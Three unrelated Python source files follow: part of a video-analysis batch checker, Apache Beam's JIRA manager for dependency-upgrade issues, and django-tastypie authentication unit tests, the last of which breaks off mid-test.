        # files that still require work: untouched + partially analysed
        tot_proc_files = len(self.filtered_files['SOURCE_GOOD']) + len(self.filtered_files['FINISHED_BAD'])
        s_msg = [BREAK_L]
        s_msg += ['Analysis Summary']
        s_msg += [BREAK_L]
        s_msg += msd_dat
        s_msg += [BREAK_L]
        s_msg += [_vals2str(tot_proc_files, 'Total files to be processed.')]
        s_msg += [BREAK_L]
        s_msg = '\n'.join(s_msg)
        return s_msg
    def filterFiles(self, valid_files, print_cmd=False):
        '''Check the progress of every file in valid_files, bucket the files
        in self.filtered_files and return the commands to execute.'''
        progress_timer = TimeCounter('')
        n_batch = mp.cpu_count()
        pool = None
        if self.is_parallel_check:
            lock = mp.Lock()
            pool = mp.Pool(n_batch, initializer=init_analysis_point_lock, initargs=(lock,))
        all_points = []
        tot_files = len(valid_files)
        try:
            for ii in range(0, tot_files, n_batch):
                dat = valid_files[ii:ii + n_batch]
                if self.is_parallel_check:
                    res = list(pool.map(self._checkIndFile, dat))
                else:
                    res = list(map(self._checkIndFile, dat))
                # extend instead of append + sum(..., []): avoids the
                # quadratic flatten at the end.
                all_points.extend(res)
                n_files = len(dat)
                print('Checking file {} of {}. Total time: {}'.format(ii + n_files,
                      tot_files, progress_timer.get_time_str()))
        finally:
            # BUGFIX: the worker pool was never shut down before (leaked
            # worker processes); close it even if a check raises.
            if pool is not None:
                pool.close()
                pool.join()
        # intialize filtered files lists
        filtered_files_fields = (
            'SOURCE_GOOD',
            'SOURCE_BAD',
            'FINISHED_GOOD',
            'FINISHED_BAD',
            'EMPTY_ANALYSIS_LIST')
        self.filtered_files = {key: [] for key in filtered_files_fields}
        for label, ap_obj, unfinished_points in all_points:
            self.filtered_files[label].append((ap_obj, unfinished_points))
        print(BREAK_L)
        print('''Finished to check files.\nTotal time elapsed {}'''.format(progress_timer.get_time_str()))
        print(BREAK_L + '\n')
        cmd_list = self.getCMDlist()
        if print_cmd:
            #print the commands to be executed
            print(BREAK_L)
            print('Commands to be executed.')
            print(BREAK_L)
            print_cmd_list(cmd_list)
            print(BREAK_L + '\n')
        print(self.summary_msg)
        return cmd_list
    def _printUnmetReq(self):
        '''Print (and return) the unmet requirements of the SOURCE_BAD files.'''
        def _get_unmet_requirements(input_data):
            # NOTE(review): the `return` sits inside the loop, so only the
            # first unmet requirement of each file is reported, and `fname`
            # is computed but never used -- kept as-is to preserve output.
            ap_obj, unfinished_points = input_data
            for requirement in ap_obj.unmet_requirements:
                if requirement in ap_obj.checkpoints:
                    fname = ap_obj.checkpoints[requirement]['provenance_file']
                else:
                    requirement = '{} : {}'.format(requirement, ap_obj.file_names['original_video'])
                return requirement
        msg_l = map(_get_unmet_requirements, self.filtered_files['SOURCE_BAD'])
        msg = '\n'.join(msg_l)
        print(msg)
        return msg
    def getCMDlist(self):
        '''Commands for partially analysed files first, then unprocessed ones.'''
        A = map(self.generateIndCMD, self.filtered_files['SOURCE_GOOD'])
        B = map(self.generateIndCMD, self.filtered_files['FINISHED_BAD'])
        return list(B) + list(A)
    def generateIndCMD(self, input_d):
        '''Build the ProcessLocal command for one (ap_obj, unfinished) pair.'''
        good_ap_obj, unfinished_points = input_d
        subdir_path = self._getSubDirPath(
            os.path.dirname(good_ap_obj.video_file),
            self.video_dir_root)
        if self.tmp_dir_root:
            tmp_mask_dir = os.path.join(self.tmp_dir_root, 'MaskedVideos', subdir_path)
            tmp_results_dir = os.path.join(self.tmp_dir_root, 'Results', subdir_path)
        else:
            # no temporary directory: work on the final destinations directly
            tmp_mask_dir, tmp_results_dir = '', ''
        args = [good_ap_obj.video_file]
        argkws = {'masks_dir': good_ap_obj.masks_dir,
                  'results_dir': good_ap_obj.results_dir,
                  'tmp_mask_dir': tmp_mask_dir,
                  'tmp_results_dir': tmp_results_dir,
                  'json_file': self.json_file,
                  'analysis_checkpoints': unfinished_points,
                  'is_copy_video': self.is_copy_video,
                  'copy_unfinished': self.copy_unfinished}
        cmd = create_script(BATCH_SCRIPT_LOCAL, args, argkws)
        return cmd
| |
from __future__ import print_function
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import traceback
import yaml
import dependency_check.version_comparer as version_comparer
from datetime import datetime
from jira_client import JiraClient
_JIRA_PROJECT_NAME = 'BEAM'
_JIRA_COMPONENT = 'dependencies'
# Every auto-managed issue summary starts with this prefix so existing
# issues can be found again through a summary search.
_ISSUE_SUMMARY_PREFIX = 'Beam Dependency Update Request: '
# Minimum days since closure before a closed issue may be reopened.
_ISSUE_REOPEN_DAYS = 180
class JiraManager:
  """Creates, updates and reopens the JIRA issues that track Beam
  dependency upgrades: one issue per dependency, grouped (for Java) as
  sub-tasks under a parent issue per group id."""

  def __init__(self, jira_url, jira_username, jira_password, owners_file):
    """
    Args:
      jira_url: base URL of the JIRA server.
      jira_username, jira_password: credentials for basic auth.
      owners_file: path of the YAML file mapping dependencies to owners.
    """
    options = {
      'server': jira_url
    }
    basic_auth = (jira_username, jira_password)
    self.jira = JiraClient(options, basic_auth, _JIRA_PROJECT_NAME)
    with open(owners_file) as f:
      # SECURITY/BUGFIX: safe_load instead of yaml.load without a Loader.
      # The owners file is plain data; yaml.load can construct arbitrary
      # Python objects and is deprecated without an explicit Loader.
      owners = yaml.safe_load(f)
    self.owners_map = owners['deps']
    logging.getLogger().setLevel(logging.INFO)

  def run(self, dep_name,
      dep_current_version,
      dep_latest_version,
      sdk_type,
      group_id=None):
    """
    Manage the jira issue for a dependency
    Args:
      dep_name: name of the dependency.
      dep_current_version: version currently used by Beam.
      dep_latest_version: newest released version.
      sdk_type: Java, Python
      group_id (optional): only required for Java dependencies
    Return: Jira Issue, or None when a Java parent issue could not be
      created/reopened.
    """
    logging.info("Start handling the JIRA issues for {0} dependency: {1} {2}".format(
        sdk_type, dep_name, dep_latest_version))
    try:
      # find the parent issue for Java deps base on the groupID
      parent_issue = None
      if sdk_type == 'Java':
        summary = _ISSUE_SUMMARY_PREFIX + group_id
        parent_issues = self._search_issues(summary)
        for i in parent_issues:
          if i.fields.summary == summary:
            parent_issue = i
            break
        # Create a new parent issue if no existing found
        if not parent_issue:
          logging.info("""Did not find existing issue with name {0}. \n
          Created a parent issue for {1}""".format(summary, group_id))
          try:
            parent_issue = self._create_issue(group_id, None, None)
          except Exception:
            # BUGFIX: narrowed from a bare `except:` so SystemExit and
            # KeyboardInterrupt are no longer swallowed.
            logging.error("""Failed creating a parent issue for {0}.
            Stop handling the JIRA issue for {1}, {2}""".format(group_id, dep_name, dep_latest_version))
            return
        # Reopen the existing parent issue if it was closed
        elif (parent_issue.fields.status.name != 'Open' and
            parent_issue.fields.status.name != 'Reopened'):
          logging.info("""The parent issue {0} is not opening. Attempt reopening the issue""".format(parent_issue.key))
          try:
            self.jira.reopen_issue(parent_issue)
          except Exception:
            # BUGFIX: narrowed from a bare `except:` (see above).
            traceback.print_exc()
            logging.error("""Failed reopening the parent issue {0}.
            Stop handling the JIRA issue for {1}, {2}""".format(parent_issue.key, dep_name, dep_latest_version))
            return
      # BUGFIX: guard the log line -- parent_issue is None for non-Java
      # dependencies and `parent_issue.key` raised AttributeError.
      if parent_issue is not None:
        logging.info("Found the parent issue {0}. Continuous to create or update the sub-task for {1}".format(parent_issue.key, dep_name))
      # creating a new issue/sub-task or updating on the existing issue of the dep
      summary = _ISSUE_SUMMARY_PREFIX + dep_name
      issues = self._search_issues(summary)
      issue = None
      for i in issues:
        if i.fields.summary == summary:
          issue = i
          break
      # Create a new JIRA if no existing one.
      if not issue:
        if sdk_type == 'Java':
          issue = self._create_issue(dep_name, dep_current_version, dep_latest_version, is_subtask=True, parent_key=parent_issue.key)
        else:
          issue = self._create_issue(dep_name, dep_current_version, dep_latest_version)
        logging.info('Created a new issue {0} of {1} {2}'.format(issue.key, dep_name, dep_latest_version))
      # Add descriptions in to the opening issue.
      elif issue.fields.status.name == 'Open' or issue.fields.status.name == 'Reopened':
        self._append_descriptions(issue, dep_name, dep_current_version, dep_latest_version)
        logging.info('Updated the existing issue {0} of {1} {2}'.format(issue.key, dep_name, dep_latest_version))
      # Check if we need reopen the issue if it was closed. If so, reopen it then add descriptions.
      elif self._need_reopen(issue, dep_latest_version):
        self.jira.reopen_issue(issue)
        self._append_descriptions(issue, dep_name, dep_current_version, dep_latest_version)
        logging.info("Reopened the issue {0} for {1} {2}".format(issue.key, dep_name, dep_latest_version))
      return issue
    except:
      # Redundant re-raise kept for explicitness: any unexpected error
      # propagates to the caller unchanged.
      raise

  def _create_issue(self, dep_name, dep_current_version, dep_latest_version, is_subtask=False, parent_key=None):
    """
    Create a new issue or subtask
    Args:
      dep_name
      dep_current_version: may be None for parent (group) issues.
      dep_latest_version: may be None for parent (group) issues.
      is_subtask,
      parent_key: only required if the 'is_subtask' is true.
    """
    logging.info("Creating a new JIRA issue to track {0} upgrade process".format(dep_name))
    summary = _ISSUE_SUMMARY_PREFIX + dep_name
    description = self._create_descriptions(dep_name, dep_current_version, dep_latest_version)
    try:
      if not is_subtask:
        issue = self.jira.create_issue(summary, [_JIRA_COMPONENT], description)
      else:
        issue = self.jira.create_issue(summary, [_JIRA_COMPONENT], description, parent_key=parent_key)
    except Exception as e:
      logging.error("Failed creating issue: "+ str(e))
      # bare `raise` preserves the original traceback (was `raise e`)
      raise
    return issue

  def _search_issues(self, summary):
    """
    Search issues by using issues' summary.
    Args:
      summary: a string
    Return:
      A list of issues (empty on search failure).
    """
    try:
      issues = self.jira.get_issues_by_summary(summary)
    except Exception as e:
      logging.error("Failed searching issues: "+ str(e))
      return []
    return issues

  def _append_descriptions(self, issue, dep_name, dep_current_version, dep_latest_version):
    """
    Add descriptions on an existing issue.
    Args:
      issue: Jira issue
      dep_name
      dep_current_version
      dep_latest_version
    """
    logging.info("Updating JIRA issue {0} to track {1} upgrade process".format(
        issue.key,
        dep_name))
    description = self._create_descriptions(dep_name, dep_current_version, dep_latest_version, issue=issue)
    try:
      self.jira.update_issue(issue, description=description)
    except Exception as e:
      traceback.print_exc()
      logging.error("Failed updating issue: "+ str(e))

  def _create_descriptions(self, dep_name, dep_current_version, dep_latest_version, issue = None):
    """
    Create descriptions for JIRA issues.
    Args:
      dep_name
      dep_current_version
      dep_latest_version
      issue: when given, the new text is appended to its description
        (the exact wording is parsed back by _need_reopen -- keep in sync).
    """
    description = ""
    if issue:
      description = issue.fields.description
    description += """\n\n ------------------------- {0} -------------------------\n
        Please consider upgrading the dependency {1}. \n
        The current version is {2}. The latest version is {3} \n
        cc: """.format(
        datetime.today(),
        dep_name,
        dep_current_version,
        dep_latest_version
    )
    owners = self._find_owners(dep_name)
    for owner in owners:
      description += "[~{0}], ".format(owner)
    description += ("\n Please refer to "
                    "[Beam Dependency Guide |https://beam.apache.org/contribute/dependencies/]"
                    "for more information. \n"
                    "Do Not Modify The Description Above. \n")
    return description

  def _find_owners(self, dep_name):
    """
    Find owners for a dependency/
    Args:
      dep_name
    Return:
      A (possibly empty) list of owner ids; the first entry is the primary
      owner, the others are cc'ed in the description.
    """
    try:
      dep_info = self.owners_map[dep_name]
      owners = dep_info['owners']
      if not owners:
        logging.warning("Could not find owners for " + dep_name)
        return []
    except KeyError:
      traceback.print_exc()
      logging.warning("Could not find the dependency info of {0} in the OWNERS configurations.".format(dep_name))
      return []
    except Exception as e:
      traceback.print_exc()
      logging.error("Failed finding dependency owners: "+ str(e))
      # BUGFIX: return [] instead of None -- callers iterate the result
      # and would crash on None.
      return []
    logging.info("Found owners of {0}: {1}".format(dep_name, owners))
    owners = owners.split(',')
    owners = map(str.strip, owners)
    owners = list(filter(None, owners))
    return owners

  def _need_reopen(self, issue, dep_latest_version):
    """
    Return a boolean that indicates whether reopen the closed issue.
    """
    # Check if the issue was closed with a "fix version/s"
    # Reopen the issue if it hits the next release version.
    next_release_version = self._get_next_release_version()
    for fix_version in issue.fields.fixVersions:
      if fix_version.name in next_release_version:
        return True
    # Check if there is other new versions released.
    # Reopen the issue if 3 new versions have been released in 6 month since closure.
    try:
      if issue.fields.resolutiondate:
        closing_date = datetime.strptime(issue.fields.resolutiondate[:19], "%Y-%m-%dT%H:%M:%S")
        if (datetime.today() - closing_date).days >= _ISSUE_REOPEN_DAYS:
          # Extract the previous version when JIRA closed.
          descriptions = issue.fields.description.splitlines()
          # the 5th line from the bottom carries the version sentence
          # written by _create_descriptions -- keep both in sync.
          descriptions = descriptions[len(descriptions)-5]
          previous_version = descriptions.split("The latest version is", 1)[1].strip()
          if version_comparer.compare_dependency_versions(previous_version, dep_latest_version):
            return True
    except Exception as e:
      traceback.print_exc()
      logging.error("Failed deciding to reopen the issue." + str(e))
      return False
    return False

  def _get_next_release_version(self):
    """
    Return the incoming release version from sdks/python/apache_beam/version.py
    """
    global_names = {}
    version_path = os.path.join(
        os.path.dirname(os.path.abspath(__file__)),
        '../../../sdks/python/',
        'apache_beam/version.py')
    # exec of the in-repo version.py is intentional (trusted source); it
    # avoids importing the whole apache_beam package just for __version__.
    # BUGFIX: the file handle was previously never closed.
    with open(version_path) as f:
      exec(f.read(), global_names)
    return global_names['__version__']
| |
import base64
import os
import time
import warnings
from django.conf import settings
from django.contrib.auth.models import AnonymousUser, User
from django.http import HttpRequest
from django.test import TestCase
from django.test.testcases import skipIf
from tastypie.authentication import Authentication, BasicAuthentication,\
ApiKeyAuthentication, SessionAuthentication, DigestAuthentication,\
OAuthAuthentication, MultiAuthentication
from tastypie.http import HttpUnauthorized
from tastypie.models import ApiKey, create_api_key
# Be tricky.
# These names are re-exported by tastypie.authentication and are None when
# the optional third-party package is not installed; warn loudly so it is
# obvious why the related auth backends would misbehave in the tests below.
from tastypie.authentication import python_digest, oauth2, oauth_provider
if python_digest is None:
    warnings.warn("Running tests without python_digest! Bad news!")
if oauth2 is None:
    warnings.warn("Running tests without oauth2! Bad news!")
if oauth_provider is None:
    warnings.warn("Running tests without oauth_provider! Bad news!")
class AuthenticationTestCase(TestCase):
    """Tests for the no-op base `Authentication` backend."""
    fixtures = ['note_testdata.json']

    def test_is_authenticated(self):
        # The base backend accepts everything, even a None request.
        backend = Authentication()
        self.assertTrue(backend.is_authenticated(None))
        self.assertTrue(backend.is_authenticated(HttpRequest()))

    def test_get_identifier(self):
        backend = Authentication()

        # Without address metadata a placeholder identifier is returned.
        self.assertEqual(backend.get_identifier(HttpRequest()), 'noaddr_nohost')

        # Otherwise the identifier is "<remote addr>_<remote host>".
        req = HttpRequest()
        req.META['REMOTE_ADDR'] = '127.0.0.1'
        req.META['REMOTE_HOST'] = 'nebula.local'
        self.assertEqual(backend.get_identifier(req), '127.0.0.1_nebula.local')

    def test_check_active_false(self):
        # With require_active=False both active and inactive users pass.
        for username in ('johndoe', 'bobdoe'):
            backend = Authentication(require_active=False)
            account = User.objects.get(username=username)
            self.assertTrue(backend.check_active(account))

    def test_check_active_true(self):
        # With require_active=True only active accounts pass the check.
        backend = Authentication(require_active=True)
        self.assertTrue(backend.check_active(User.objects.get(username='johndoe')))

        backend = Authentication(require_active=True)
        self.assertFalse(backend.check_active(User.objects.get(username='bobdoe')))

        # require_active defaults to True.
        backend = Authentication()
        self.assertFalse(backend.check_active(User.objects.get(username='bobdoe')))
class BasicAuthenticationTestCase(TestCase):
    """Tests for the HTTP Basic `BasicAuthentication` backend."""
    fixtures = ['note_testdata.json']

    def _b64(self, credentials):
        # Base64 payload ("user:password") for the Authorization header.
        return base64.b64encode(credentials.encode('utf-8')).decode('utf-8')

    def _set_password(self, username, password):
        account = User.objects.get(username=username)
        account.set_password(password)
        account.save()

    def test_is_authenticated(self):
        backend = BasicAuthentication()
        request = HttpRequest()

        # Missing HTTP Basic auth details are rejected ...
        response = backend.is_authenticated(request)
        self.assertTrue(isinstance(response, HttpUnauthorized))
        # ... and the challenge advertises the auth type and realm.
        self.assertEqual(response['WWW-Authenticate'], 'Basic Realm="django-tastypie"')

        # Malformed header.
        request.META['HTTP_AUTHORIZATION'] = 'abcdefg'
        self.assertTrue(isinstance(backend.is_authenticated(request), HttpUnauthorized))

        # Username without a password.
        request.META['HTTP_AUTHORIZATION'] = self._b64('daniel')
        self.assertTrue(isinstance(backend.is_authenticated(request), HttpUnauthorized))

        # Unknown user / wrong password.
        request.META['HTTP_AUTHORIZATION'] = self._b64('daniel:pass')
        self.assertTrue(isinstance(backend.is_authenticated(request), HttpUnauthorized))

        # Correct credentials.
        self._set_password('johndoe', 'pass')
        request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % self._b64('johndoe:pass')
        self.assertEqual(backend.is_authenticated(request), True)

        # Regression: a password containing a colon must still work.
        self._set_password('johndoe', 'pass:word')
        request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % self._b64('johndoe:pass:word')
        self.assertEqual(backend.is_authenticated(request), True)

        # The "Basic" prefix is matched case-insensitively.
        self._set_password('johndoe', 'pass:word')
        request.META['HTTP_AUTHORIZATION'] = 'bAsIc %s' % self._b64('johndoe:pass:word')
        self.assertEqual(backend.is_authenticated(request), True)

    def test_check_active_true(self):
        backend = BasicAuthentication()
        request = HttpRequest()
        self._set_password('bobdoe', 'pass')
        request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % self._b64('bobdoe:pass')
        # bobdoe is inactive, so authentication fails by default.
        self.assertFalse(backend.is_authenticated(request))

    def test_check_active_false(self):
        backend = BasicAuthentication(require_active=False)
        request = HttpRequest()
        self._set_password('bobdoe', 'pass')
        request.META['HTTP_AUTHORIZATION'] = 'Basic %s' % self._b64('bobdoe:pass')
        # With require_active=False the inactive account is accepted.
        self.assertTrue(backend.is_authenticated(request))
class ApiKeyAuthenticationTestCase(TestCase):
    """Tests for ``ApiKeyAuthentication`` via GET params and the
    ``Authorization: ApiKey user:key`` header."""
    # Fixture supplies the 'johndoe' and 'bobdoe' users referenced below.
    fixtures = ['note_testdata.json']

    def setUp(self):
        super(ApiKeyAuthenticationTestCase, self).setUp()
        # Start from a clean slate; keys are created per-test via the signal.
        ApiKey.objects.all().delete()

    def test_is_authenticated_get_params(self):
        """API-key auth supplied as ?username=...&api_key=... parameters."""
        auth = ApiKeyAuthentication()
        request = HttpRequest()
        # Simulate sending the post-save signal to create johndoe's key.
        john_doe = User.objects.get(username='johndoe')
        create_api_key(User, instance=john_doe, created=True)
        # No username/api_key details should fail.
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # Wrong username details.
        request.GET['username'] = 'foo'
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # No api_key.
        request.GET['username'] = 'daniel'
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # Wrong user/api_key.
        request.GET['username'] = 'daniel'
        request.GET['api_key'] = 'foo'
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # Correct user/api_key.
        john_doe = User.objects.get(username='johndoe')
        request.GET['username'] = 'johndoe'
        request.GET['api_key'] = john_doe.api_key.key
        self.assertEqual(auth.is_authenticated(request), True)
        self.assertEqual(auth.get_identifier(request), 'johndoe')

    def test_is_authenticated_header(self):
        """API-key auth supplied as an 'Authorization: ApiKey ...' header."""
        auth = ApiKeyAuthentication()
        request = HttpRequest()
        # Simulate sending the post-save signal to create johndoe's key.
        john_doe = User.objects.get(username='johndoe')
        create_api_key(User, instance=john_doe, created=True)
        # No username/api_key details should fail.
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # Wrong username details.
        request.META['HTTP_AUTHORIZATION'] = 'foo'
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # No api_key.
        request.META['HTTP_AUTHORIZATION'] = 'ApiKey daniel'
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # Wrong user/api_key.
        request.META['HTTP_AUTHORIZATION'] = 'ApiKey daniel:pass'
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)
        # Correct user/api_key.
        john_doe = User.objects.get(username='johndoe')
        request.META['HTTP_AUTHORIZATION'] = 'ApiKey johndoe:%s' % john_doe.api_key.key
        self.assertEqual(auth.is_authenticated(request), True)
        # Capitalization of the auth scheme shouldn't matter.
        john_doe = User.objects.get(username='johndoe')
        request.META['HTTP_AUTHORIZATION'] = 'aPiKeY johndoe:%s' % john_doe.api_key.key
        self.assertEqual(auth.is_authenticated(request), True)
        # Deleted api_key: previously-valid credentials must stop working.
        john_doe = User.objects.get(username='johndoe')
        api_key = john_doe.api_key
        api_key.delete()
        request.META['HTTP_AUTHORIZATION'] = 'ApiKey johndoe:%s' % api_key.key
        self.assertEqual(isinstance(auth.is_authenticated(request), HttpUnauthorized), True)

    def test_check_active_true(self):
        """Default require_active=True rejects a valid key for an inactive user."""
        auth = ApiKeyAuthentication()
        request = HttpRequest()
        bob_doe = User.objects.get(username='bobdoe')
        create_api_key(User, instance=bob_doe, created=True)
        request.META['HTTP_AUTHORIZATION'] = 'ApiKey bobdoe:%s' % bob_doe.api_key.key
        self.assertFalse(auth.is_authenticated(request))

    def test_check_active_false(self):
        """require_active=False lets the inactive user's key authenticate.

        Bug fix: this previously instantiated ``BasicAuthentication``, which
        cannot accept an 'ApiKey ...' header at all; the assertTrue only
        passed because the returned HttpUnauthorized response object is
        truthy. It must test ``ApiKeyAuthentication``.
        """
        auth = ApiKeyAuthentication(require_active=False)
        request = HttpRequest()
        bob_doe = User.objects.get(username='bobdoe')
        create_api_key(User, instance=bob_doe, created=True)
        request.META['HTTP_AUTHORIZATION'] = 'ApiKey bobdoe:%s' % bob_doe.api_key.key
        self.assertTrue(auth.is_authenticated(request))
class SessionAuthenticationTestCase(TestCase):
    """Tests for ``SessionAuthentication`` (Django session + CSRF checks)."""
    # Fixture supplies the 'johndoe' user referenced below.
    fixtures = ['note_testdata.json']
    def test_is_authenticated(self):
        """Covers CSRF token validation, login state, and the HTTPS referer
        check for POST requests; GET requests skip the CSRF check."""
        auth = SessionAuthentication()
        request = HttpRequest()
        request.method = 'POST'
        # The cookie value is the reference token the header must match.
        request.COOKIES = {
            settings.CSRF_COOKIE_NAME: 'abcdef1234567890abcdef1234567890'
        }
        # No CSRF token.
        request.META = {}
        self.assertFalse(auth.is_authenticated(request))
        # Invalid CSRF token.
        request.META = {
            'HTTP_X_CSRFTOKEN': 'abc123'
        }
        self.assertFalse(auth.is_authenticated(request))
        # Not logged in.
        request.META = {
            'HTTP_X_CSRFTOKEN': 'abcdef1234567890abcdef1234567890'
        }
        request.user = AnonymousUser()
        self.assertFalse(auth.is_authenticated(request))
        # Logged in.
        request.user = User.objects.get(username='johndoe')
        self.assertTrue(auth.is_authenticated(request))
        # Logged in (with GET & no token).
        request.method = 'GET'
        request.META = {}
        request.user = User.objects.get(username='johndoe')
        self.assertTrue(auth.is_authenticated(request))
        # Secure & wrong referrer. The HTTPS env var makes the request report
        # as secure (presumably via Django's is_secure() check — verify).
        os.environ["HTTPS"] = "on"
        request.method = 'POST'
        request.META = {
            'HTTP_X_CSRFTOKEN': 'abcdef1234567890abcdef1234567890'
        }
        request.META['HTTP_HOST'] = 'example.com'
        request.META['HTTP_REFERER'] = ''
        self.assertFalse(auth.is_authenticated(request))
        # Secure & correct referrer.
        request.META['HTTP_REFERER'] = 'https://example.com/'
        self.assertTrue(auth.is_authenticated(request))
        os.environ["HTTPS"] = "off"
    def test_get_identifier(self):
        """Identifier is the username for authenticated users, '' otherwise."""
        auth = SessionAuthentication()
        request = HttpRequest()
        # Not logged in.
        request.user = AnonymousUser()
        self.assertEqual(auth.get_identifier(request), '')
        # Logged in.
        request.user = User.objects.get(username='johndoe')
        self.assertEqual(auth.get_identifier(request), 'johndoe')
@skipIf(python_digest is None, "python-digest is not installed")
class DigestAuthenticationTestCase(TestCase):
    """Tests for ``DigestAuthentication`` (RFC 2617 digest, keyed on the
    user's ApiKey as the password)."""
    # Fixture supplies the 'johndoe' and 'bobdoe' users referenced below.
    fixtures = ['note_testdata.json']

    def setUp(self):
        super(DigestAuthenticationTestCase, self).setUp()
        # Start from a clean slate; keys are created per-test via the signal.
        ApiKey.objects.all().delete()

    def test_is_authenticated(self):
        """Walks through missing, malformed, wrong and valid digest credentials."""
        auth = DigestAuthentication()
        request = HttpRequest()
        # Simulate sending the post-save signal to create johndoe's key.
        john_doe = User.objects.get(username='johndoe')
        create_api_key(User, instance=john_doe, created=True)
        # No auth details should fail, and the challenge must carry the
        # digest parameters the client needs to respond.
        auth_request = auth.is_authenticated(request)
        self.assertEqual(isinstance(auth_request, HttpUnauthorized), True)
        # HttpUnauthorized with auth type, realm, opaque and nonce.
        self.assertEqual(auth_request['WWW-Authenticate'].find('Digest'), 0)
        self.assertEqual(auth_request['WWW-Authenticate'].find(' realm="django-tastypie"') > 0, True)
        self.assertEqual(auth_request['WWW-Authenticate'].find(' opaque=') > 0, True)
        self.assertEqual(auth_request['WWW-Authenticate'].find('nonce=') > 0, True)
        # Garbage auth header.
        request.META['HTTP_AUTHORIZATION'] = 'abcdefg'
        auth_request = auth.is_authenticated(request)
        self.assertEqual(isinstance(auth_request, HttpUnauthorized), True)
        # No password (a bare base64 token is not a digest response).
        request.META['HTTP_AUTHORIZATION'] = base64.b64encode('daniel'.encode('utf-8')).decode('utf-8')
        auth_request = auth.is_authenticated(request)
        self.assertEqual(isinstance(auth_request, HttpUnauthorized), True)
        # Wrong user/password.
        request.META['HTTP_AUTHORIZATION'] = base64.b64encode('daniel:pass'.encode('utf-8')).decode('utf-8')
        auth_request = auth.is_authenticated(request)
        self.assertEqual(isinstance(auth_request, HttpUnauthorized), True)
        # Correct response built from the server's own challenge; the api key
        # serves as the digest password.
        john_doe = User.objects.get(username='johndoe')
        request.META['HTTP_AUTHORIZATION'] = python_digest.build_authorization_request(
            username=john_doe.username,
            method=request.method,
            uri='/',
            nonce_count=1,
            digest_challenge=python_digest.parse_digest_challenge(auth_request['WWW-Authenticate']),
            password=john_doe.api_key.key
        )
        auth_request = auth.is_authenticated(request)
        self.assertEqual(auth_request, True)

    def test_check_active_true(self):
        """Default require_active=True rejects valid digest credentials for
        the inactive 'bobdoe' user."""
        auth = DigestAuthentication()
        request = HttpRequest()
        bob_doe = User.objects.get(username='bobdoe')
        create_api_key(User, instance=bob_doe, created=True)
        # First round-trip obtains the challenge to respond to.
        auth_request = auth.is_authenticated(request)
        request.META['HTTP_AUTHORIZATION'] = python_digest.build_authorization_request(
            username=bob_doe.username,
            method=request.method,
            uri='/',
            nonce_count=1,
            digest_challenge=python_digest.parse_digest_challenge(auth_request['WWW-Authenticate']),
            password=bob_doe.api_key.key
        )
        auth_request = auth.is_authenticated(request)
        self.assertFalse(auth_request)

    def test_check_active_false(self):
        """require_active=False lets the inactive user authenticate."""
        auth = DigestAuthentication(require_active=False)
        request = HttpRequest()
        bob_doe = User.objects.get(username='bobdoe')
        create_api_key(User, instance=bob_doe, created=True)
        # First round-trip obtains the challenge to respond to.
        auth_request = auth.is_authenticated(request)
        request.META['HTTP_AUTHORIZATION'] = python_digest.build_authorization_request(
            username=bob_doe.username,
            method=request.method,
            uri='/',
            nonce_count=1,
            digest_challenge=python_digest.parse_digest_challenge(auth_request['WWW-Authenticate']),
            password=bob_doe.api_key.key
        )
        auth_request = auth.is_authenticated(request)
        # Bug fix: was assertTrue(auth_request, True) — the second argument
        # of assertTrue is the failure *message*, so passing True there was
        # meaningless. Assert the truthiness alone.
        self.assertTrue(auth_request)
@skipIf(not oauth2 or not oauth_provider, "oauth provider not installed")
class OAuthAuthenticationTestCase(TestCase):
    """Tests for ``OAuthAuthentication`` using PLAINTEXT-signed requests."""
    # Fixture supplies the 'bobdoe' user referenced below.
    fixtures = ['note_testdata.json']
    def setUp(self):
        super(OAuthAuthenticationTestCase, self).setUp()
        self.request = HttpRequest()
        self.request.META['SERVER_NAME'] = 'testsuite'
        self.request.META['SERVER_PORT'] = '8080'
        self.request.REQUEST = self.request.GET = {}
        self.request.method = "GET"
        # Imported here so the module-level skipIf can fire before this runs.
        from oauth_provider.models import Consumer, Token, Resource
        self.user = User.objects.create_user('daniel', 'test@example.com', 'password')
        self.user_inactive = User.objects.get(username='bobdoe')
        self.resource, _ = Resource.objects.get_or_create(url='test', defaults={
            'name': 'Test Resource'
        })
        self.consumer, _ = Consumer.objects.get_or_create(key='123', defaults={
            'name': 'Test',
            'description': 'Testing...'
        })
        # Access token 'foo' belongs to the active user...
        self.token, _ = Token.objects.get_or_create(key='foo', token_type=Token.ACCESS, defaults={
            'consumer': self.consumer,
            'resource': self.resource,
            'secret': '',
            'user': self.user,
        })
        # ...and token 'bar' to the inactive one.
        self.token_inactive, _ = Token.objects.get_or_create(key='bar', token_type=Token.ACCESS, defaults={
            'consumer': self.consumer,
            'resource': self.resource,
            'secret': '',
            'user': self.user_inactive,
        })
    def test_is_authenticated(self):
        """A bare request is 401; a signed request authenticates and binds
        request.user to the token's owner."""
        auth = OAuthAuthentication()
        # Invalid request.
        resp = auth.is_authenticated(self.request)
        self.assertEqual(resp.status_code, 401)
        # Valid PLAINTEXT-signed parameters for the active user's token.
        self.request.REQUEST = self.request.GET = {
            'oauth_consumer_key': '123',
            'oauth_nonce': 'abc',
            'oauth_signature': '&',
            'oauth_signature_method': 'PLAINTEXT',
            'oauth_timestamp': str(int(time.time())),
            'oauth_token': 'foo',
        }
